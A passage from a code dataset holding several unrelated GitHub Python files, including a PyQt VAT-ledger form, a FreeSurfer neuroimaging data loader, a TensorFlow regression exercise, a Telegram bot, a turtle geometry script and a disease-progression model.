self.obj_form.setupUi(self)\n self.obj_form.btn_buscar.clicked.connect(self.buscar)\n self.obj_form.pushButton_2.clicked.connect(self.pushButton_2)\n\n self.obj_form.lne_10_5.editingFinished.connect(self.sumar)\n self.obj_form.lne_21.editingFinished.connect(self.sumar)\n self.obj_form.lne_monotrib.editingFinished.connect(self.sumar)\n self.obj_form.lne_no_grav.editingFinished.connect(self.sumar)\n self.obj_form.lne_iibb.editingFinished.connect(self.sumar)\n self.obj_form.lne_27.editingFinished.connect(self.sumar)\n self.obj_form.lne_iva.editingFinished.connect(self.sumar)\n self.obj_form.lne_otros.editingFinished.connect(self.sumar)\n self.obj_form.lne_percepcion_iva.editingFinished.connect(self.sumar)\n\n def sumar(self):\n suma1 = float(self.obj_form.lne_10_5.text()) + float(self.obj_form.lne_21.text())\n suma2 = float(self.obj_form.lne_monotrib.text()) + float(self.obj_form.lne_no_grav.text()) + float(self.obj_form.lne_iibb.text())\n suma3 = float(self.obj_form.lne_27.text()) + float(self.obj_form.lne_iva.text()) + float(self.obj_form.lne_otros.text())\n suma4 = float(self.obj_form.lne_percepcion_iva.text())\n total = suma1 + suma2 + suma3 + suma4\n self.obj_form.lne_resultado.setText(str(total))\n\n def limpiar(self):\n self.obj_form.cbx_proveedor.clear()\n self.obj_form.cbx_ejercicio.clear()\n self.lista_ejercicio = \"\"\n self.lista_proveedor = \"\"\n self.lista_ejercicio_detalle = \"\"\n\n def buscar(self):\n self.limpiar()\n\n #self.limpiar()\n if self.obj_form.lne_cuit.text() !=\"\":\n cuit = self.obj_form.lne_cuit.text()\n obj_e_cliente= E_cliente()\n self.obj_cliente = obj_e_cliente.get_cliente_cuit_cuil(cuit)\n if self.obj_cliente == False :\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Atencion\")\n msgBox.setText('No se encontro el cliente')\n msgBox.exec_()\n else:\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Atencion\")\n msgBox.setText('Cliente OK')\n msgBox.exec_()\n self.obj_form.lne_razon_social.setText(self.obj_cliente.razon_social)\n\n obj_e_proveedor = E_proveedor()\n self.lista_proveedor = obj_e_proveedor.buscar_proveedores(self.obj_cliente.id_cliente)\n for item in self.lista_proveedor:\n 
self.obj_form.cbx_proveedor.addItem(item.nombre)\n\n obj_e_ejercicio = E_ejercicio()\n self.lista_ejercicio = obj_e_ejercicio.get_ejercicio_id_cliente(self.obj_cliente.id_cliente)\n for item in self.lista_ejercicio:\n self.obj_form.cbx_ejercicio.addItem(item.descripcion)\n\n\n\n def pushButton_2(self):\n\n obj_e_E_libro_iva_ventas = E_libro_iva_ventas()\n obj_e_E_libro_iva_ventas.fecha = self.obj_form.dte_fec_nuevo.text()\n obj_e_E_libro_iva_ventas.nro_comprobante = self.obj_form.lne_comprbante.text()\n obj_proveedor = \"\"\n for item in self.lista_proveedor:\n if self.obj_form.cbx_proveedor.currentText() == item.nombre:\n obj_proveedor = item\n\n obj_e_E_libro_iva_ventas.id_proveedor = obj_proveedor.id_proveedor\n obj_e_E_libro_iva_ventas.tipo = self.obj_form.cbx_tipo.currentText()\n obj_e_E_libro_iva_ventas.neto_10_5 = self.obj_form.lne_10_5.text()\n obj_e_E_libro_iva_ventas.neto_21 = self.obj_form.lne_21.text()\n obj_e_E_libro_iva_ventas.neto_27 = self.obj_form.lne_27.text()\n obj_e_E_libro_iva_ventas.neto_27 = self.obj_form.lne_27.text()\n obj_e_E_libro_iva_ventas.iva = self.obj_form.lne_iva.text()\n obj_e_E_libro_iva_ventas.monotributo = self.obj_form.lne_monotrib.text()\n obj_e_E_libro_iva_ventas.impuestos_otros = self.obj_form.lne_otros.text()\n obj_e_E_libro_iva_ventas.percepcion_iva = self.obj_form.lne_percepcion_iva.text()\n obj_e_E_libro_iva_ventas.percepcion_IBB = self.obj_form.lne_iibb.text()\n #obj_e_E_libro_iva_ventas.ref = self.obj_form.lne_ref.text()\n obj_e_E_libro_iva_ventas.no_gravado = self.obj_form.lne_no_grav.text()\n obj_e_E_libro_iva_ventas.id_cliente = self.obj_cliente.id_cliente\n #pyqtRemoveInputHook()\n #import pdb;pdb.set_trace()\n obj_ejercicio = \"\"\n for item in self.lista_ejercicio:\n if item.descripcion == self.obj_form.cbx_ejercicio.currentText():\n obj_ejercicio= item\n\n obj_e_E_libro_iva_ventas.id_ejercicio = obj_ejercicio.id_ejercicio\n\n obj_E_ejercicio_detalle = E_ejercicio_detalle()\n self.lista_ejercicio_detalle = obj_E_ejercicio_detalle.buscar_ejercicios_id_ejercicio(obj_ejercicio.id_ejercicio)\n obj_ejercicio_detalle = \"\"\n for item in self.lista_ejercicio_detalle:\n if item.mes == self.obj_form.cbx_mes.currentText():\n obj_ejercicio_detalle=item\n obj_e_E_libro_iva_ventas.id_ejercicio_detalle = obj_ejercicio_detalle.id_ejercicio_detalle\n\n\n obj_e_E_libro_iva_ventas.guardar(obj_e_E_libro_iva_ventas)\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Atencion\")\n msgBox.setText('Registro guardado OK')\n msgBox.exec_()\n","repo_name":"lriccombene/sgc1","sub_path":"w_form_libro_iva_ventas_nuevo.py","file_name":"w_form_libro_iva_ventas_nuevo.py","file_ext":"py","file_size_in_byte":6098,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5676369303","text":"from env import *\nimport pandas as pd\nimport numpy as np\n\n\ndef agregateFSDataDRC():\n\n\n drcFSSubjDir = '/home/razvan/seagate/DRC_data/fs_subjects'\n exportSubjCmd = 'export SUBJECTS_DIR=%s' % drcFSSubjDir\n exportFreeSurfCmd = 'export FREESURFER_HOME=%s; source %s/SetUpFreeSurfer.sh' \\\n % (freesurfPath, freesurfPath)\n\n from glob import glob\n subjFlds = [x.split('/')[-2] for x in glob(\"%s/*/\" % drcFSSubjDir)]\n\n\n # subjFlds = [x[0] for x in os.walk(drcFSSubjDir)]\n\n # print('subjFlds', subjFlds)\n # print(asd)\n\n subjListStr = ' '.join(subjFlds)\n print(subjListStr)\n runAggreg = False\n\n subcortProg = 'asegstats2table'\n subcortOutFile = 'drcFSXSubcort.csv'\n subcortFsAggCmd = '%s ; %s; %s/bin/%s --subjects %s 
--meas volume --skip ' \\\n    '--tablefile %s --delimiter=comma ' % (exportSubjCmd, exportFreeSurfCmd,\n    freesurfPath, subcortProg, subjListStr, subcortOutFile)\n  print(subcortFsAggCmd)\n  if runAggreg:\n    os.system(subcortFsAggCmd)\n  dfSubcort = pd.read_csv(subcortOutFile)\n\n  cortProg = 'aparcstats2table'\n  cortLhOutFile = 'drcFSXCortLh.csv'\n  cortLhFsAggCmd = '%s ; %s; %s/bin/%s --subjects %s --meas volume --hemi lh --skip ' \\\n    '--tablefile %s --delimiter=comma ' % (exportSubjCmd, exportFreeSurfCmd,\n    freesurfPath, cortProg, subjListStr, cortLhOutFile)\n  print(cortLhFsAggCmd)\n  if runAggreg:\n    os.system(cortLhFsAggCmd)\n  dfCortLh = pd.read_csv(cortLhOutFile)\n\n  cortRhOutFile = 'drcFSXCortRh.csv'\n  cortRhFsAggCmd = '%s ; %s; %s/bin/%s --subjects %s --meas volume --hemi rh --skip ' \\\n    '--tablefile %s --delimiter=comma ' % (exportSubjCmd, exportFreeSurfCmd,\n    freesurfPath, cortProg, subjListStr, cortRhOutFile)\n  print(cortRhFsAggCmd)\n  if runAggreg:\n    os.system(cortRhFsAggCmd)\n  dfCortRh = pd.read_csv(cortRhOutFile)\n\n  assert dfSubcort.shape[0] == dfCortLh.shape[0] == dfCortRh.shape[0]\n\n  dfAll = dfSubcort\n  dfAll[dfCortLh.columns] = dfCortLh\n  dfAll[dfCortRh.columns] = dfCortRh\n\n  # print(adss)\n  dfAll['partCode'] = [int(x.split('-')[0][4:]) for x in dfAll['Measure:volume']]\n  dfAll['studyID'] = [int(x.split('-')[2]) for x in dfAll['Measure:volume']]\n\n  # print(np.where(dfAll['studyID'] == 0))\n  # print(asd)\n  # There are two rows with the same scanID 3560. Identical FS volumes\n  # suggest this scan is duplicated. Drop both of them.\n  print(np.where(dfAll['studyID'] == 3560))\n  idxToDrop = np.where(np.in1d(dfAll['studyID'], [3560, 0]))[0]\n  # idxToDrop = np.logical_or(dfAll['studyID'] == 3560, np.in1d(dfAll.partCode == 1222))\n  dfAll.drop(dfAll.index[idxToDrop], inplace=True)\n  dfAll.reset_index(drop=True, inplace=True)\n\n  print(np.where(dfAll['studyID'] == 3560))\n  # print(ads)\n\n  return dfAll\n\ndef addMetadataDrc(dfAll):\n  ############ load metadata - age, gender, ... 
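(participantCode, pcaDiag, ageAtScan, studyID, gender, read from pcaData.mat below) 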
###########\n\n # load metadata in order to get the timepoint information for each subj id\n metaData = sio.loadmat('pcaData.mat')\n\n print(metaData.keys())\n partCode = metaData['participantCode']\n diag = metaData['pcaDiag']\n ageAtScan = metaData['ageAtScan']\n studyID = metaData['studyID']\n gender = metaData['gender']\n # subgroupPCA = metaData['subgroupPCA']\n # subgroupPCA = ageAtScan\n\n print(dfAll['studyID'].shape)\n # print(ads)\n nrSubjCross = dfAll.shape[0]\n unqPart = np.unique(dfAll['partCode'])\n nrUnqPart = unqPart.shape[0]\n\n ageAtScanDf = np.nan * np.ones(nrSubjCross, float)\n genderDf = np.nan * np.ones(nrSubjCross, float)\n diagDf = np.nan * np.ones(nrSubjCross, float)\n Month_blDf = np.nan * np.ones(nrSubjCross, float)\n\n # print('studyID.shape', studyID.shape, np.unique(studyID).shape)\n # print()\n # print(asd)\n # print('age 3560 ', ageAtScan[studyID == 3560])\n # print('gender 3560 ', gender[studyID == 3560])\n # print('diag 3560 ', diag[studyID == 3560])\n # print('partCode 3560 ', partCode[studyID == 3560])\n\n for s in range(nrSubjCross):\n # print(dfAll['studyID'][s])\n # print(dfAll['studyID'][s] == studyID)\n idx = (dfAll['studyID'][s] == studyID).reshape(-1)\n if np.sum(idx) > 1:\n print(dfAll['studyID'][s])\n\n if np.sum(idx) == 1:\n # print(ageAtScan[idx])\n ageAtScanDf[s] = ageAtScan[idx]\n genderDf[s] = gender[idx]\n diagDf[s] = diag[idx]\n\n # print(adsa)\n\n for p in range(nrUnqPart):\n currPartIndDf = dfAll['partCode'] == unqPart[p]\n ageCurrPartDf = ageAtScanDf[currPartIndDf]\n Month_blDf[currPartIndDf] = (ageCurrPartDf - np.min(ageCurrPartDf))*12.0\n\n\n dfAll['ageAtScan'] = ageAtScanDf\n dfAll['gender'] = genderDf\n dfAll['diag'] = diagDf\n dfAll['Month_bl'] = Month_blDf\n\n return dfAll\n\n ##############\n\ndef loadDRC(drcFile, columnsFormat):\n # first use Freesurfer to aggregate all the volume information into one csv file\n\n df = agregateFSDataDRC()\n\n df = addMetadataDrc(df)\n # print(adssa)\n columnsFormat = columnsFormat[1:]\n # print(columnsFormat)\n # print(asd)\n\n dataDf = pd.DataFrame(np.nan * np.ones((df.shape[0], len(columnsFormat))),\n columns=columnsFormat)\n print(dataDf.columns)\n dataDf.reindex(range(df.shape[0]))\n dataDf[['RID', 'Month_bl', 'scanID']] = df[['partCode', 'Month_bl', 'studyID']]\n\n # dataDf.rename(index=str, columns={\"partCode\": \"RID\"}, inplace=True)\n # print(dataDf.loc[:10,:])\n\n # print(list(df.columns))\n # print(ads)\n\n # add ageDrc, genderDrc, ICVTadpoleDrc, dataset\n dataDf['age'] = df['ageAtScan']\n dataDf['gender-0f1m'] = df['gender']\n dataDf['dataset'] = 2 # number identifying current dataset\n dataDf['diag'] = df['diag']\n\n print(dataDf['diag'])\n mapDiagDRC = {1: CTL2, 2: PCA, 3: AD2}\n dataDf['diag'] = dataDf['diag'].map(mapDiagDRC)\n # print(asd)\n\n ######## MRI biomk selection ################\n\n\n\n\n '''\n Frontal\n\n Superior Frontal\n Rostral and Caudal Middle Frontal\n Pars Opercularis, Pars Triangularis, and Pars Orbitalis\n Lateral and Medial Orbitofrontal\n Precentral\n Paracentral\n Frontal Pole\n\n Parietal\n\n Superior Parietal\n Inferior Parietal\n Supramarginal\n Postcentral\n Precuneus\n\n Temporal\n\n Superior, Middle, and Inferior Temporal\n Banks of the Superior Temporal Sulcus\n Fusiform\n Transverse Temporal\n Entorhinal\n Temporal Pole\n Parahippocampal\n\n Occipital\n\n Lateral Occipital\n Lingual\n Cuneus\n Pericalcarine\n\n Cingulate (if you want to include in a lobe)\n\n Rostral Anterior (Frontal)\n Caudal Anterior (Frontal)\n Posterior (Parietal)\n Isthmus 
(Parietal)\n\n  '''\n\n  volBiomkStruct = {\n    'ICV' : ['EstimatedTotalIntraCranialVol'],\n    'Volume Frontal' : ['lh_caudalmiddlefrontal_volume',\n      'lh_lateralorbitofrontal_volume', 'lh_medialorbitofrontal_volume',\n      'lh_rostralmiddlefrontal_volume', 'lh_superiorfrontal_volume',\n      'lh_frontalpole_volume', 'lh_paracentral_volume',\n      'lh_parsopercularis_volume', 'lh_parsorbitalis_volume',\n      'lh_parstriangularis_volume', 'lh_precentral_volume',\n      'lh_rostralmiddlefrontal_volume'],\n    'Volume Parietal' : ['lh_inferiorparietal_volume',\n      'lh_postcentral_volume', 'lh_precuneus_volume',\n      'lh_superiorparietal_volume'],\n    'Volume Temporal' : ['lh_entorhinal_volume', 'lh_fusiform_volume',\n      'lh_inferiortemporal_volume', 'lh_middletemporal_volume',\n      'lh_parahippocampal_volume', 'lh_superiortemporal_volume',\n      'lh_supramarginal_volume', 'lh_temporalpole_volume',\n      'lh_transversetemporal_volume'],\n    'Volume Occipital' : ['lh_cuneus_volume', 'lh_lateraloccipital_volume',\n      'lh_lingual_volume', 'lh_pericalcarine_volume', ],\n    'Volume Cingulate' : ['lh_caudalanteriorcingulate_volume',\n      'lh_isthmuscingulate_volume', 'lh_posteriorcingulate_volume',\n      'lh_rostralanteriorcingulate_volume', ],\n    'Volume Hippocampus': ['Left-Hippocampus', 'Right-Hippocampus']\n  }\n\n  for k in volBiomkStruct.keys():\n    volBiomkStruct[k] += ['rh%s' % x[2:] for x in volBiomkStruct[k]\n      if x[:2] == 'lh']\n\n  dataDf = addBiomks(volBiomkStruct, df, dataDf, collapseFunc=np.sum)\n\n  cogTestsDf = None\n  # print(dataDf.loc[:10,:])\n  # print(ads)\n\n  return dataDf\n","repo_name":"razvanmarinescu/dkt","sub_path":"drcDataLoader.py","file_name":"drcDataLoader.py","file_ext":"py","file_size_in_byte":8044,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"11957656346","text":"# Fetch batch function, completed as a minimal sketch (the original body only\n# returned undefined names): sample a random mini-batch from the full arrays\n# defined below. The numpy import and the sampling strategy are assumptions,\n# not the assignment's original code.\n\nimport numpy as np\n\ndef fetch_batch(epoch, batch_index, batch_size):\n    # epoch and batch_index are kept for API compatibility\n    indices = np.random.randint(scaled_housing_data_plus_bias.shape[0], size=batch_size)\n    X_batch = scaled_housing_data_plus_bias[indices]\n    y_batch = housing_data_target[indices]\n    return X_batch, y_batch\n\n\n# Set up computational graph:\n\nimport tensorflow as tf\nreset_graph()  # helper assumed to be defined elsewhere in the assignment\n\nn_epochs = 1000\nlearning_rate = 0.01\n\nX = tf.constant(scaled_housing_data_plus_bias, dtype=tf.float32, name=\"X\")\ny = tf.constant(housing_data_target, dtype=tf.float32, name=\"y\")\n\ntheta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0), name=\"theta\")  # n: number of features, defined elsewhere\ny_pred = tf.matmul(X, theta, name=\"predictions\")\nerror = y_pred - y\nmse = tf.reduce_mean(tf.square(error), name=\"mse\")\noptimizer = tf.train.GradientDescentOptimizer(learning_rate)\ntraining_op = optimizer.minimize(mse)\n\n\n# Execute:\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n    sess.run(init)\n    for epoch in range(n_epochs):\n        if epoch % 100 == 0:\n            print(\"Epoch\", epoch, \"MSE=\", mse.eval())\n        sess.run(training_op)\n    best_theta = theta.eval()\n\n\n","repo_name":"johnduffymsc/msc_spce0038assessment","sub_path":"question_4f.py","file_name":"question_4f.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37241281142","text":"# Let us simplify the code a bit!\n\nfrom random import randint\n\npwd = ''\n\n# The variable \"n\" is not used.\n# Replace it with _\nfor _ in range(15):\n    # pwd is assigned to itself plus\n    # something more, let us use +=\n    pwd += chr(randint(33, 127))\nprint(pwd)\n\n# Good!","repo_name":"ash/amazing_python3","sub_path":"365-simplify.py","file_name":"365-simplify.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"}
+{"seq_id":"14236002959","text":"#Um professor quer sortear um dos seus quatro alunos para apagar o quadro. Faça um programa que ajude ele, lendo o\n# nome deles e escrevendo o nome do escolhido.\nfrom random import choice\npa = input('Primeiro aluno: ')\nsa = input('Segundo aluno: ')\nta = input('Terceiro aluno: ')\nqa = input('Quarto aluno: ')\nlista = [pa, sa, ta, qa]\ne = choice(lista)\nprint('O aluno escolhido foi \\033[4;1;37m{}\\033[m.'.format(e))\n","repo_name":"filipaBrandao/CursoemVideoPython","sub_path":"ex019.py","file_name":"ex019.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21204854294","text":"import time \n\n#this test changes the temp, humidity, ldr and ammnia data in run time\n\ndef changeReadData(readData, soundAnalysis):\n while True:\n time.sleep(1)\n readData[0] += 1\n readData[1] += 1\n readData[2] += 1\n readData[3] += 1\n\n soundAnalysis[0] += 1\n soundAnalysis[1] += 1\n\ndef displaysendData(sendData):\n while True:\n time.sleep(1)\n print(\"Heater: \", sendData[0])\n print(\"Fans: \", sendData[1])\n print(\"Lights: \", sendData[2])\n print(\"Servo: \", sendData[3])\n print(\"------------------------\")\n\n","repo_name":"AwaleSajil/PLF","sub_path":"Python All in one/test7.py","file_name":"test7.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71725203986","text":"class Solution(object):\n def deleteDuplicates(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n dummy = ListNode(0)\n dummy.next = head\n # pre代表是无重复链表\n pre = dummy\n # cur是探测是否有重复的指针\n cur = head\n\n while cur and cur.next:\n # 当cur检测到重复\n if cur.val == cur.next.val:\n temp = cur.val\n # 一直让cur移动到不重复区域\n while cur and temp == cur.val:\n cur = cur.next\n # 让pre连接到不重复区域\n pre.next = cur\n else:\n pre = pre.next\n cur = cur.next\n\n return dummy.next\n\n\"\"\"\n古城算法 7:00\nhttps://www.bilibili.com/video/BV1e5411c7JR/?spm_id_from=333.999.0.0&vd_source=b81616a45fd239becaebfee25e0dbd35\n\"\"\"","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/LinkedList/删除/82.单链表去重(不保留重复).py","file_name":"82.单链表去重(不保留重复).py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73912864784","text":"from random import randint\nimport turtle\n\nclass Point:\n \"\"\"Point class - to create a point having x & y coordinate\n \n Attributes:\n x: horizontal x-axis\n y: vertial y-axis\n \n Methods:\n falls_in_rectangle: return true if point exists inside rectangle and if not return false.\n \"\"\"\n def __init__(self, x, y) -> None:\n self.x = x\n self.y = y\n\n def falls_in_rectangle(self, rectangle):\n if rectangle.point1.x < self.x < rectangle.point2.x and rectangle.point1.y < self.y < rectangle.point2.y:\n return True\n else:\n return False\n\n\nclass Rectangle:\n \"\"\"rectangle class - made of two points i.e point1 & point2\n \n Attributes:\n point1: a point object\n point2: another point object\n \n Methods:\n area: return the area of the rectangle formed by those two points.\n \"\"\"\n def __init__(self, point1, point2) -> None:\n self.point1 = point1\n self.point2 = point2\n \n def area(self):\n return (self.point2.x - self.point1.x) * (self.point2.y - self.point1.y)\n\n\nclass GraphicalRectangle(Rectangle):\n \"\"\"creates a new window - for the rectangle\"\"\"\n def draw(self, 
canvas):\n\n # move from origin to point1\n canvas.penup()\n canvas.goto(self.point1.x, self.point1.y)\n\n # from point1 start drawing \n canvas.pendown()\n canvas.forward(self.point2.x - self.point1.x)\n canvas.left(90)\n canvas.forward(self.point2.y - self.point1.y)\n canvas.left(90)\n canvas.forward(self.point2.x - self.point1.x)\n canvas.left(90)\n canvas.forward(self.point2.y - self.point1.y)\n\n\nclass GraphicalPoint(Point):\n \"\"\"creates a graphival point in window\"\"\"\n def draw(self, canvas, size = 10, color= 'red'):\n canvas.penup()\n canvas.goto(self.x, self.y)\n\n canvas.pendown()\n canvas.dot(size, color)\n\nx = float(input(\"Enter x: \"))\ny = float(input(\"Enter y: \"))\n\npointA = GraphicalPoint(x, y)\n\n\nrectanglex = GraphicalRectangle(Point(randint(5, 90), randint(5, 90)), Point(randint(50, 200), randint(50, 200)))\n# rectanglex = GraphicalRectangle(Point(50, 100), Point(100,200))\nprint(f\"Rectangle point1: {rectanglex.point1.x}, {rectanglex.point1.y}\")\nprint(f\"Rectangle point2: {rectanglex.point2.x}, {rectanglex.point2.y}\")\n\nguessed_area = float(input(\"Guess area of rectangle: \"))\n\nprint(\"Area of rectangle: \", rectanglex.area())\n\nif not pointA.falls_in_rectangle(rectanglex):\n print(f\"Area off by: {rectanglex.area() - guessed_area}\")\nelse:\n print(\"Point is present inside rectangle\")\n\n\nmyturtle = turtle.Turtle()\nrectanglex.draw(canvas=myturtle)\npointA.draw(canvas=myturtle)\n\nturtle.done()\n\n\n\n\n\n","repo_name":"bhattaditya/Python-Projects","sub_path":"geometry/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40878736735","text":"class Chat(object):\n def __init__(self, id: int, type: str, **kwargs):\n self.id = id\n self.type = type\n for key in kwargs:\n setattr(self, key, kwargs[key])\n\n\nclass User(object):\n def __init__(self, id: int, **kwargs):\n self.id = id\n for key in kwargs:\n setattr(self, key, kwargs[key])\n\n\nclass IncomingMessage(object):\n def __init__(self, message_id: int, chat, **kwargs):\n self.message_id = message_id\n self.chat = Chat(**chat)\n for key in kwargs:\n if key == 'from':\n kwargs[key] = User(**kwargs[key])\n setattr(self, key, kwargs[key])\n\n\nclass CallbackQuery(object):\n def __init__(self, id: int, **kwargs):\n self.id = id\n for key in kwargs:\n if key == 'message':\n kwargs[key] = IncomingMessage(**kwargs[key])\n if key == 'from':\n kwargs[key] = User(**kwargs[key])\n setattr(self, key, kwargs[key])\n\n\nclass Update(object):\n def __init__(self, update_id: int, **kwargs):\n self.update_id = update_id\n for key in kwargs:\n if key == 'callback_query':\n kwargs[key] = CallbackQuery(**kwargs[key])\n if key == 'message':\n kwargs[key] = IncomingMessage(**kwargs[key])\n setattr(self, key, kwargs[key])\n","repo_name":"Appvelox/tgmsg","sub_path":"tgmsg/models/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43790147951","text":"import logging\n\nfrom aiogram import Bot, types, executor\nfrom aiogram.contrib.middlewares.logging import LoggingMiddleware\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram.utils.executor import start_webhook\nfrom bot.settings import (BOT_TOKEN, HEROKU_APP_NAME,\n WEBHOOK_URL, WEBHOOK_PATH,\n WEBAPP_HOST, WEBAPP_PORT)\n\nbot = Bot(token=BOT_TOKEN)\ndp = 
Dispatcher(bot)\ndp.middleware.setup(LoggingMiddleware())\n\n\n@dp.message_handler(commands=['hello'])\nasync def send_welcome(message: types.Message):\n await message.reply('Hi!\\n Im KBot.')\n\n\n@dp.message_handler(regexp='(^cat[s]?$|puss|кот[ик]|киса)')\nasync def cats(message: types.Message):\n with open('data/cats.jpg', 'rb') as photo:\n await message.reply_photo(photo, caption='Cats r here.')\n\n\nasync def on_startup(dp):\n logging.warning('Starting connection.')\n await bot.set_webhook(WEBHOOK_URL, drop_pending_updates=True)\n\n\nasync def on_shutdown(dp):\n logging.warning('Shutting down webhook connection.')\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n start_webhook(\n dispatcher=dp,\n webhook_path=WEBHOOK_PATH,\n skip_updates=True,\n on_startup=on_startup,\n host=WEBAPP_HOST,\n port=WEBAPP_PORT,\n )\n\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True)\n","repo_name":"sherifflight/kbot","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7982030026","text":"import os\nimport shutil\n\nremove_dirs = []\n\nfor root, dirs, files in os.walk(\"preprocessed\"):\n if root.endswith(\"\\processed\") or root.endswith(\"raw\"):\n remove_dirs.append(root)\n\nfor remove_dir in remove_dirs:\n print(remove_dir)\n shutil.rmtree(remove_dir)\n","repo_name":"thcheung/DSCAN","sub_path":"remove.py","file_name":"remove.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5676345093","text":"import numpy as np\nimport scipy as sp\n\nclass ParHierModel:\n\n def __init__(self, dysfuncParams, thetas, mapBiomkToFuncUnits, parFunc, sigmaB):\n self.dysfuncParams = dysfuncParams\n self.thetas = thetas\n self.mapBiomkToFuncUnits = mapBiomkToFuncUnits\n self.parFunc = parFunc # parametric function\n self.sigmaB = sigmaB\n self.nrBiomk = thetas.shape[0]\n self.nrFuncUnits = np.unique(mapBiomkToFuncUnits).shape[0]\n\n # self.subShiftsLongTrue = subShiftsLongTrue\n # self.subShiftsCrossTrue = subShiftsLongTrue[long2crossInd]\n\n\n def timeShiftFuncCross(self, ageAtVisitCross):\n\n return ageAtVisitCross + self.subShiftsCrossTrue\n\n\n def predPopBiomk(self, dpsCross, b):\n '''\n Predict population-level effect f_b (X) evaluated at dps (X) for biomarker b\n\n :param dpsCross: 1D disease progression scores for all subjects and visits, or X\n :param b: biomarker nr\n :return: Y = f_b (X)\n '''\n\n # find dysfunction scores for each subject\n dysScoresS = self.parFunc(dpsCross, self.dysfuncParams[self.mapBiomkToFuncUnits[b],:])\n modelPredS = self.parFunc(dysScoresS, self.thetas[b,:])\n\n return modelPredS\n\n def predPopDys(self, dpsCross):\n '''\n Predict population-level effect f_b (X) evaluated at dps (X) for biomarker b\n\n :param dpsCross: 1D disease progression scores for all subjects and visits, or X\n :param b: biomarker nr\n :return: Y = f_b (X)\n '''\n\n dysScoresSU = np.zeros((dpsCross.shape[0], self.nrFuncUnits), float)\n\n # find dysfunction scores for each subject\n for u in range(self.nrFuncUnits):\n dysScoresSU[:,u] = self.parFunc(dpsCross, self.dysfuncParams[u,:])\n\n assert dysScoresSU.shape[0] == dpsCross.shape[0]\n assert dysScoresSU.shape[1] == self.nrFuncUnits\n\n return dysScoresSU\n\n def predPopFromDysfunc(self, dysScoresS):\n '''\n Predict population-level effect f_b (X) evaluated at dps (X) for biomarker 
b\n\n :param dpsCross: 1D disease progression scores for all subjects and visits, or X\n :param b: biomarker nr\n :return: Y = f_b (X)\n '''\n\n modelPredSB = np.zeros((dysScoresS.shape[0], self.nrBiomk), float)\n\n # find dysfunction scores for each subject\n for b in range(self.nrBiomk):\n modelPredSB[:,b] = self.parFunc(dysScoresS, self.thetas[b, :])\n\n return modelPredSB\n\n def predPop(self, dpsCross):\n '''\n Predict population-level effect f(X) = [f_1(X) .. f_n(X)] evaluated at dps (X) for all biomarkers\n\n :param dpsCross: 1D disease progression scores for all subjects and visits, or X\n :return: Y = f(X)\n '''\n\n modelPredSB = np.zeros((dpsCross.shape[0], self.nrBiomk), float)\n\n dysScoresSF = self.predPopDys(dpsCross)\n\n for b in range(self.nrBiomk):\n f = self.mapBiomkToFuncUnits[b]\n print(dysScoresSF.shape)\n print(self.thetas[b, :].shape)\n modelPredSB[:,b] = self.parFunc(dysScoresSF[:,f], self.thetas[b, :])\n\n assert modelPredSB.shape[0] == dpsCross.shape[0]\n assert modelPredSB.shape[1] == self.nrBiomk\n\n return modelPredSB\n\n def genDataIID(self, dpsCross):\n dataCrossSB = np.zeros((dpsCross.shape[0], self.nrBiomk), float)\n\n for b in range(self.nrBiomk):\n dataCrossSB[:,b] = self.predPopBiomk(dpsCross, b) + np.random.normal(0,self.sigmaB[b], dpsCross.shape[0])\n\n assert dataCrossSB.shape[0] == dpsCross.shape[0]\n assert dataCrossSB.shape[1] == self.nrBiomk\n\n return dataCrossSB\n\n @staticmethod\n def makeLongArray(array, scanTimepts, partCode, uniquePartCode):\n # place data in a longitudinal format\n longArray = [] # longArray can be data, diag, ageAtScan,scanTimepts, etc .. both 1D or 2D\n nrParticipants = len(uniquePartCode)\n\n longCounter = 0\n\n for p in range(nrParticipants):\n # print('Participant %d' % uniquePartCode[p])\n currPartIndices = np.where(partCode == uniquePartCode[p])[0]\n currPartTimepoints = scanTimepts[currPartIndices]\n currPartTimeptsOrdInd = np.argsort(currPartTimepoints)\n # print uniquePartCode[p], currPartIndices, currPartTimepoints, currPartTimeptsOrdInd\n currPartIndicesOrd = currPartIndices[currPartTimeptsOrdInd]\n # print(uniquePartCode[p], currPartIndicesOrd)\n\n # assert(len(currPartTimeptsOrdInd) >= 2) # 2 for PET, 3 for MRI\n\n # if len(currPartTimeptsOrdInd) > 1:\n longArray += [array[currPartIndicesOrd]]\n\n return 